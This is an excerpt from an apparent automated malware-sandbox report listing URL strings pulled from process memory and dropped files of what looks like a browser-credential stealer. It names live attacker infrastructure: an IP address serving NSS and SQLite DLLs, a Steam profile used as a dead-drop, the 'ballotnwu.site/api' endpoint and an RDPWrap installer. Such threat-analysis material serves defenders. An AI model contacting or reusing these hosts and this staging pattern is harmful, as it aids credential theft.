Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eu
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://hansgborn.eud
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr	String found in binary or memory: http://stascorp.com/load/1-1-0-62
Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rdpwrap.dll.19.dr, RDPWInst.exe.12.dr	String found in binary or memory: http://stascorp.comDVarFileInfo$
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr	String found in binary or memory: http://www.apache.org/licenses/
Source: RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.dr	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000002.00000002.2471362906.00000000199DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486219527.000000001F97D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://5.75.211.162
Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162.exe
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/2
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/9
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/:3#
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/CGDHJEGHJ
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/D
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/V3
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/Z
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dll
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/freebl3.dlll
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/g
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dll&
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/mozglue.dllX
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll0
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/msvcp140.dll4
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/nss3.dll
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dll
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/softokn3.dllv
Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000055E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dll
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllB
Source: RegAsm.exe, 0000000B.00000002.2823050611.0000000000D01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllI
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/sqlp.dllV
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dll
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162/vcruntime140.dllW
Source: RegAsm.exe, 0000000B.00000002.2820883103.0000000000563000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.1620.5938.132
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162AEBFC
Source: RegAsm.exe, 0000000B.00000002.2820883103.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162HDGIE
Source: RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://5.75.211.162a
Source: IDHIEB.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199780418869[1].htm.2.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site/api
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ballotnwu.site:443/api
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, CBAKJE.2.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: IDHIEB.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: IDHIEB.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: IDHIEB.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.0000000000528000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2820883103.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
